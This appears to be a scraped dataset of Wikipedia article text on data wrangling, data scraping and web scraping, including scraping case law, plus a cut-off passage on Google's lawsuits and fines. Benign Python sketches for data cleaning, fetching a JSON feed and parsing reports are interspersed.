373 On October 8, 2018, a class action lawsuit was filed against Google and Alphabet due to "non-public" Google account data being exposed as a result of a bug that allowed app developers to gain access to the private information of users. The litigation was settled in July 2020 for $7.5 million with a payout to claimants of at least $5 each, with a maximum of $12 each. 374 375 376 On March 20, 2019, the European Commission imposed a 1.49 billion ($1.69 billion) fine on Google for preventing rivals from being able to "compete and innovate fairly" in the online advertising market. European Union competition commissioner Margrethe Vestager said Google had violated EU antitrust rules by "imposing anti-competitive contractual restrictions on third-party websites" that required them to exclude search results from Google's rivals. 377 378 On September 14, 2022, Google lost the appeal of a 4.125 billion ( 3.5 billion) fine, which was ruled to be paid after it was proved by the European Commission that Google forced Android phone-makers to carry Google's search and web browser apps. Since the initial accusations, Google has changed its policy. 379 On January 21, 2019, French data regulator CNIL imposed a record 50 million fine on Google for breaching the European Union's General Data Protection Regulation. The judgment claimed Google had failed to sufficiently inform users of its methods for collecting data to personalize advertising. Google issued a statement saying it was "deeply committed" to transparency and was "studying the decision" before determining its response. 380 On January 6, 2022, France's data privacy regulatory body CNIL fined Alphabet's Google 150 million euros (US$169 million) for not allowing its Internet users an easy refusal of Cookies along with Facebook. 381 On March 20, 2024, Google was fined approximately $270 million by French regulators for using content from news outlets in France without proper disclosure to train its AI, Bard, now renamed Gemini, violating a previous commitment to negotiate content use transparently and fairly. 382 After U.S. Congressional hearings in July 2020, 383 and a report from the U.S. House of Representatives' Antitrust Subcommittee released in early October, 384 the United States Department of Justice filed an antitrust lawsuit against Google on October 20, 2020, asserting that it has illegally maintained its monopoly position in web search and search advertising. 385 386 The lawsuit alleged that Google engaged in anticompetitive behavior by paying Apple between $8 billion and $12 billion to be the default search engine on iPhones. 387 Later that month, both Facebook and Alphabet agreed to "cooperate and assist one another" in the face of investigation into their online advertising practices. 388 389 Another suit was brought against Google in 2023 for illegally monopolizing the advertising technology market. 390 In early June 2020, a $5 billion class-action lawsuit was filed against Google by a group of consumers, alleging that Chrome's Incognito browsing mode still collects their user history. 391 392 The lawsuit became known in March 2021 when a federal judge denied Google's request to dismiss the case, ruling that they must face the group's charges. 393 394 Reuters reported that the lawsuit alleged that Google's CEO Sundar Pichai sought to keep the users unaware of this issue. 395 In April 2024, it was announced that Google agreed to settle this lawsuit. 
Under the terms of the settlement Google agreed to destroy billions of data records to settle a lawsuit claiming it secretly tracked the internet use of people who thought they were browsing privately. 396 In 2017, three women sued Google, accusing the company of violating California's Equal Pay Act by underpaying its female employees. The lawsuit cited the wage gap was around $17,000 and that Google locked women into lower career tracks, leading to smaller salaries and bonuses. In June 2022, Google agreed to pay a $118 million settlement to 15,550 female employees working in California since 2013. As a part of the settlement, Google also agreed to hire a third party to analyze its hiring and compensation practices. 397 398 399 Following media reports about PRISM, the NSA's massive electronic surveillance program, in June 2013, several technology companies were identified as participants, including Google. 400 According to unnamed sources, Google joined the PRISM program in 2009, as YouTube in 2010. 401 Google has worked with the United States Department of Defense on drone software through the 2017 Project Maven that could be used to improve the accuracy of drone strikes. 402 In April 2018, thousands of Google employees, including senior engineers, signed a letter urging Google CEO Sundar Pichai to end this controversial contract with the Pentagon. 403 Google ultimately decided not to renew this DoD contract, which was set to expire in 2019. 404 |
161 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_munging | Data wrangling, sometimes referred to as data munging, is the process of transforming and mapping data from one "raw" data form into another format with the intent of making it more appropriate and valuable for a variety of downstream purposes such as analytics. The goal of data wrangling is to assure quality and useful data. Data analysts typically spend the majority of their time in the process of data wrangling compared to the actual analysis of the data. The process of data wrangling may include further munging, data visualization, data aggregation, training a statistical model, as well as many other potential uses. Data wrangling typically follows a set of general steps which begin with extracting the data in a raw form from the data source, "munging" the raw data (e.g. sorting) or parsing the data into predefined data structures, and finally depositing the resulting content into a data sink for storage and future use. 1 It is closely aligned with the ETL process. The "wrangler" non-technical term is often said to derive from work done by the United States Library of Congress's National Digital Information Infrastructure and Preservation Program (NDIIPP) and their program partner the Emory University Libraries based MetaArchive Partnership. The term "mung" has roots in munging as described in the Jargon File. 2 The term "data wrangler" was also suggested as the best analogy to describe someone working with data. 3 One of the first mentions of data wrangling in a scientific context was by Donald Cline during the NASA NOAA Cold Lands Processes Experiment. 4 Cline stated the data wranglers "coordinate the acquisition of the entire collection of the experiment data. Cline also specifies duties typically handled by a storage administrator for working with large amounts of data. This can occur in areas like major research projects and the making of films with a large amount of complex computer-generated imagery. In research, this involves both data transfer from research instrument to storage grid or storage facility as well as data manipulation for re-analysis via high-performance computing instruments or access via cyberinfrastructure-based digital libraries. With the upcoming of artificial intelligence in data science it has become increasingly important for automation of data wrangling to have very strict checks and balances, which is why the munging process of data has not been automated by machine learning. Data munging requires more than just an automated solution, it requires knowledge of what information should be removed and artificial intelligence is not to the point of understanding such things. 5 Data wrangling is a superset of data mining and requires processes that some data mining uses, but not always. The process of data mining is to find patterns within large data sets, where data wrangling transforms data in order to deliver insights about that data. Even though data wrangling is a superset of data mining does not mean that data mining does not use it, there are many use cases for data wrangling in data mining. Data wrangling can benefit data mining by removing data that does not benefit the overall set, or is not formatted properly, which will yield better results for the overall data mining process. 
An example of data mining that is closely related to data wrangling is ignoring data from a set that is not connected to the goal: say there is a data set related to the state of Texas and the goal is to get statistics on the residents of Houston, the data in the set related to the residents of Dallas is not useful to the overall set and can be removed before processing to improve the efficiency of the data mining process. With an increase of raw data comes an increase in the amount of data that is not inherently useful, this increases time spent on cleaning and organizing data before it can be analyzed which is where data wrangling comes into play. The result of data wrangling can provide important metadata statistics for further insights about the data, it is important to ensure metadata is consistent otherwise it can cause roadblocks. Data wrangling allows analysts to analyze more complex data more quickly, achieve more accurate results, and because of this better decisions can be made. Many businesses have moved to data wrangling because of the success that it has brought. The main steps in data wrangling are as follows: This all-encompassing term describes how to understand your data. This is the first step to familiarize yourself with your data. These steps are an iterative process that should yield a clean and usable data set that can then be used for analysis. This process is tedious but rewarding as it allows analysts to get the information they need out of a large set of data that would otherwise be unreadable. The result of using the data wrangling process on this small data set shows a significantly easier data set to read. All names are now formatted the same way, first name last name , phone numbers are also formatted the same way area code-XXX-XXXX , dates are formatted numerically YYYY-mm-dd , and states are no longer abbreviated. The entry for Jacob Alan did not have fully formed data (the area code on the phone number is missing and the birth date had no year), so it was discarded from the data set. Now that the resulting data set is cleaned and readable, it is ready to be either deployed or evaluated. The data transformations are typically applied to distinct entities (e.g. fields, rows, columns, data values, etc.) within a data set, and could include such actions as extractions, parsing, joining, standardizing, augmenting, cleansing, consolidating, and filtering to create desired wrangling outputs that can be leveraged downstream. The recipients could be individuals, such as data architects or data scientists who will investigate the data further, business users who will consume the data directly in reports, or systems that will further process the data and write it into targets such as data warehouses, data lakes, or downstream applications. Depending on the amount and format of the incoming data, data wrangling has traditionally been performed manually (e.g. via spreadsheets such as Excel), tools like KNIME or via scripts in languages such as Python or SQL. R, a language often used in data mining and statistical data analysis, is now also sometimes used for data wrangling. 6 Data wranglers typically have skills sets within: R or Python, SQL, PHP, Scala, and more languages typically used for analyzing data. Visual data wrangling systems were developed to make data wrangling accessible for non-programmers, and simpler for programmers. 
Some of these also include embedded AI recommenders and programming by example facilities to provide user assistance, and program synthesis techniques to autogenerate scalable dataflow code. Early prototypes of visual data wrangling tools include OpenRefine and the Stanford Berkeley Wrangler research system; 7 the latter evolved into Trifacta. Other terms for these processes have included data franchising, 8 data preparation, and data munging. Given a set of data that contains information on medical patients your goal is to find correlation for a disease. Before you can start iterating through the data ensure that you have an understanding of the result, are you looking for patients who have the disease? Are there other diseases that can be the cause? Once an understanding of the outcome is achieved then the data wrangling process can begin. Start by determining the structure of the outcome, what is important to understand the disease diagnosis. Once a final structure is determined, clean the data by removing any data points that are not helpful or are malformed, this could include patients that have not been diagnosed with any disease. After cleaning look at the data again, is there anything that can be added to the data set that is already known that would benefit it? An example could be most common diseases in the area, America and India are very different when it comes to most common diseases. Now comes the validation step, determine validation rules for which data points need to be checked for validity, this could include date of birth or checking for specific diseases. After the validation step the data should now be organized and prepared for either deployment or evaluation. This process can be beneficial for determining correlations for disease diagnosis as it will reduce the vast amount of data into something that can be easily analyzed for an accurate result. |
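As a rough illustration of the wrangling steps described in the row above (reformatting names, phone numbers, dates, and state abbreviations, then discarding malformed records), here is a minimal pandas sketch. The column names, sample records, and helper functions are hypothetical and are not taken from the source article.

import pandas as pd
import re

# Hypothetical raw records, loosely modeled on the small example described above.
raw = pd.DataFrame({
    "name":  ["SMITH, JOHN", "Alan, Jacob", "jane doe"],
    "phone": ["(555) 123-4567", "123-4567", "555.987.6543"],
    "dob":   ["07/04/1990", "March 3", "1985-12-01"],
    "state": ["TX", "CA", "NY"],
})
state_names = {"TX": "Texas", "CA": "California", "NY": "New York"}

def normalize_name(value):
    # Accept either "Last, First" or "first last" and emit "First Last".
    if "," in value:
        last, first = [part.strip() for part in value.split(",", 1)]
        value = f"{first} {last}"
    return value.title()

def normalize_phone(value):
    digits = "".join(ch for ch in value if ch.isdigit())
    # Discard numbers that are missing the area code (fewer than 10 digits).
    return f"{digits[:3]}-{digits[3:6]}-{digits[6:10]}" if len(digits) == 10 else None

def normalize_date(value):
    if not re.search(r"\d{4}", value):          # no year present -> malformed
        return None
    ts = pd.to_datetime(value, errors="coerce")
    return None if pd.isna(ts) else ts.strftime("%Y-%m-%d")

clean = raw.assign(
    name=raw["name"].map(normalize_name),
    phone=raw["phone"].map(normalize_phone),
    dob=raw["dob"].map(normalize_date),
    state=raw["state"].map(state_names),
).dropna(subset=["phone", "dob"])               # drop incomplete records, as in the example
print(clean)

Each normalizer returns None for unusable values so that a single dropna call removes incomplete records, mirroring how the malformed entry in the example above was discarded.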
162 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-4 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
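The row above notes that newer scrapers often listen to the JSON feeds a site's front-end already consumes, then store the extracted data for later analysis. The following is a minimal sketch of that pattern using the requests and pandas libraries already loaded in this notebook; the feed URL and payload shape are assumptions, not a real endpoint.

import requests
import pandas as pd

# Hypothetical JSON feed; many pages populate their visible tables from an
# endpoint like this rather than embedding the data in the HTML itself.
FEED_URL = "https://example.com/api/listings.json"

def fetch_feed(url, timeout=10):
    # Download the feed and return the decoded JSON payload.
    response = requests.get(url, headers={"User-Agent": "feed-scraper/0.1"}, timeout=timeout)
    response.raise_for_status()
    return response.json()

def feed_to_frame(payload):
    # Flatten a list-of-records payload into a DataFrame for analysis.
    return pd.json_normalize(payload)

records = fetch_feed(FEED_URL)              # assumed to return a list of dicts
df = feed_to_frame(records)
df.to_csv("listings.csv", index=False)      # store for subsequent analysis
print(df.head())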
163 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Screen_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
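Report mining, as described above, works on human-readable report files rather than live screens. Here is a small sketch of that idea under assumed conditions: a fixed-layout text report (the kind a legacy system might spool to a printer) is parsed with a regular expression into a DataFrame. The report layout, column names, and pattern are illustrative only.

import re
import pandas as pd

# Hypothetical spool-file excerpt; the real layout depends entirely on the source system.
report_text = """\
DAILY SALES REPORT                     PAGE 1
ORDER NO  CUSTOMER            AMOUNT
00012     Acme Corp           1,250.00
00013     Globex Ltd            310.50
"""

# One data line per order: five-digit order number, customer name, amount.
ROW_PATTERN = re.compile(r"^(\d{5})\s+(.+?)\s+([\d,]+\.\d{2})\s*$", re.MULTILINE)

rows = [
    {"order_no": order,
     "customer": customer.strip(),
     "amount": float(amount.replace(",", ""))}
    for order, customer, amount in ROW_PATTERN.findall(report_text)
]
report_df = pd.DataFrame(rows)
print(report_df)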
164 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#HTML_parsing | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
